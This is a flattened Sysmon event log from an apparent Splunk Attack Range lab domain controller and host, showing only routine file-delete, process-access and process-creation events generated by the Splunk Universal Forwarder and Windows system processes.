23542300x8000000000000000285040Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.853{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=591D9FCA042A8760A5F45B4D1186B357,SHA256=99463F90C7FEEED24B9E7F2AE4827B394A7F9760D63C5C980CD84113E17B8493,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214132Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:20.559{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=208895BCDB09C8284520E3B5ABDB713C,SHA256=925871A787EBE4AF0577002264BE91263CBBB7327E42047892F50F9A04A0EC9A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285039Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.775{C8EA50B7-0E24-6216-A304-000000003802}60085476C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285038Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11774855B586872AD4CC1B93483A5B92,SHA256=5D83CD8640F290CBB89E093BE751FCA64E72F686F543E9507ACF1C7AE6BDC5FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285037Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E24-6216-A304-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000285036Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B71BF9B91D48810192A32E164AD9DB3,SHA256=30CCCBAA707C0B52C7F95B65B111F064369BB3F3ACBCFDB419A94B224BB31228,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285035Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285034Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285033Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E24-6216-A304-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285032Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285031Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285030Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.556{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E24-6216-A304-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285029Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.557{C8EA50B7-0E24-6216-A304-000000003802}6008C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000285028Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.291{C8EA50B7-0E24-6216-A204-000000003802}10602236C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285027Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E24-6216-A204-000000003802}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285026Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285025Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285024Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285023Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285022Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0E24-6216-A204-000000003802}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285021Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.056{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E24-6216-A204-000000003802}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285020Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:20.057{C8EA50B7-0E24-6216-A204-000000003802}1060C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000285050Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.869{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5D542DE98798D07CEF409DA932A7A2A5,SHA256=EC93B1CABC57ABB2DA8ECA1D7FFC185CF3712CDAAA0B041DD4B1FE0F01DF7DF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214134Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:36:21.575{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=059C70C88B423A93BEFD694557471B39,SHA256=648D1199823CA82B811A2AFF1E781990526165AE55CE50630775B3F818B13AE4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285049Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.588{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11774855B586872AD4CC1B93483A5B92,SHA256=5D83CD8640F290CBB89E093BE751FCA64E72F686F543E9507ACF1C7AE6BDC5FD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285048Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E25-6216-A404-000000003802}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285047Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285046Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285045Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285044Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285043Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0E25-6216-A404-000000003802}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285042Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:36:21.056{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E25-6216-A404-000000003802}6044C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program 